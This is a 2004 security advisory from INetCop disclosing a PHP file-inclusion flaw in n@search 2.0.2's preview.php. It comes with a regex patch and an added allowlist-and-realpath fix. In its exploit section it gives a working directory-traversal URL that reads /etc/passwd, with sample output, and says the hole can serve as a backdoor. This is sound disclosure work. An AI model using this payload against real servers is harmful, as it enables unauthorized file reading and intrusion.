========================================
INetCop Security Advisory #2004-0x82-024
========================================

* Title: Nasearch PHP Injection exploit

0x01. Description

One thing to be careful about when programming in PHP is the PHP Injection vulnerability. Many bulletin boards and web solutions in Korea are defeated by this very vulnerability.

We at the INetCop Security Team have discovered the following nasearch vulnerability.

nasearch/skin/empas/preview.php

  ...
  include "../../header.inc";
  include "../../nasch_connect.php";
  include "../../lib.php";
  include "../../$module";    // $module is taken unchecked from the request
  ...

The $module variable will be the attack target.

0x02. Vulnerable Packages

Vendor site: http://navyism.com/

n@search 2.0.2
 -nasearch202.zip
  +Unix
  +Linux
  +Other

0x03. Exploit

It can be exploited very simply. Local files can be read, and by executing particular PHP code it can be used as a backdoor.

The following is an attack example that reads the contents of the /etc/passwd file.

http://nasearch_host/skin/empas/preview.php?module=../../../../../../../../etc/passwd

Attack result:

--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
.. the contents of /etc/passwd are printed on the screen ..
--

0x04. Patch

A way to block it at the syntax level is as follows.

nasearch/skin/empas/preview.php:

  ...
  // patch core
  // In a regular expression "." matches any character, so this rejects
  // any two characters followed by "/" (which covers "../").
  if(eregi("..\/",$module)) {
    printf("\$module error");
    exit;
  }
  ...

--
Thank you.
--

By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
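As an added example that is not part of this advisory and not code from n@search, the following PHP places the advisory's regex check beside a stricter allowlist-plus-realpath check for the same $module parameter. The directory layout (preview.php in nasearch/skin/empas/, included files two levels up) is taken from the advisory; the helper names (module_passes_regex_check, resolve_module) and the module file names in $allowed_modules are assumptions. eregi() was removed in PHP 7, so preg_match() stands in for it.

```php
<?php
// Added example; not code from the INetCop advisory or from n@search.
// Assumed layout: this file is nasearch/skin/empas/preview.php and the
// files it includes live in nasearch/ (two directories up).

// 1. The advisory's check, expressed with preg_match() instead of the
//    removed eregi(). In a regex "." matches any character, so the pattern
//    rejects any two characters followed by "/" (so "ab/cd.php" fails it,
//    not only "../"). It is a blocklist: it describes bad input.
function module_passes_regex_check(string $module): bool
{
    return preg_match('#..\/#', $module) !== 1;
}

// 2. Allowlist plus path containment. The request may only name one of a
//    fixed set of files, and the path that name resolves to must stay
//    inside the nasearch base directory. realpath() collapses ".." and
//    symlinks, so any traversal shows up as a resolved path that no longer
//    starts with the base directory. Returns the resolved path or null.
function resolve_module(string $module, string $base_dir, array $allowed_modules): ?string
{
    if (!in_array($module, $allowed_modules, true)) {
        return null;                      // not a known module name
    }
    $base   = realpath($base_dir);
    $target = realpath($base_dir . '/' . $module);
    if ($base === false || $target === false) {
        return null;                      // base directory or file missing
    }
    // Compare against "base/" so that a sibling directory with the same
    // prefix (e.g. nasearch2/) is not accepted.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                      // resolved outside the base directory
    }
    return $target;
}

// Usage inside preview.php (module names are hypothetical):
$allowed_modules = ['search.php', 'preview_body.php'];
$base_dir = __DIR__ . '/../..';           // nasearch/ relative to skin/empas/

$requested = $_GET['module'] ?? '';
$path = resolve_module($requested, $base_dir, $allowed_modules);
if ($path === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('$module error');
}
include $path;
```

The allowlist is the part that matters: once $module can only be one of a handful of known file names, the include no longer depends on what characters an attacker can or cannot smuggle into the parameter, and the realpath() containment check guards against a mistake in the list itself (for example an entry that is a symlink pointing outside nasearch/). The regex form is retained only to show what the advisory's one-line patch accepts and rejects.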
MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--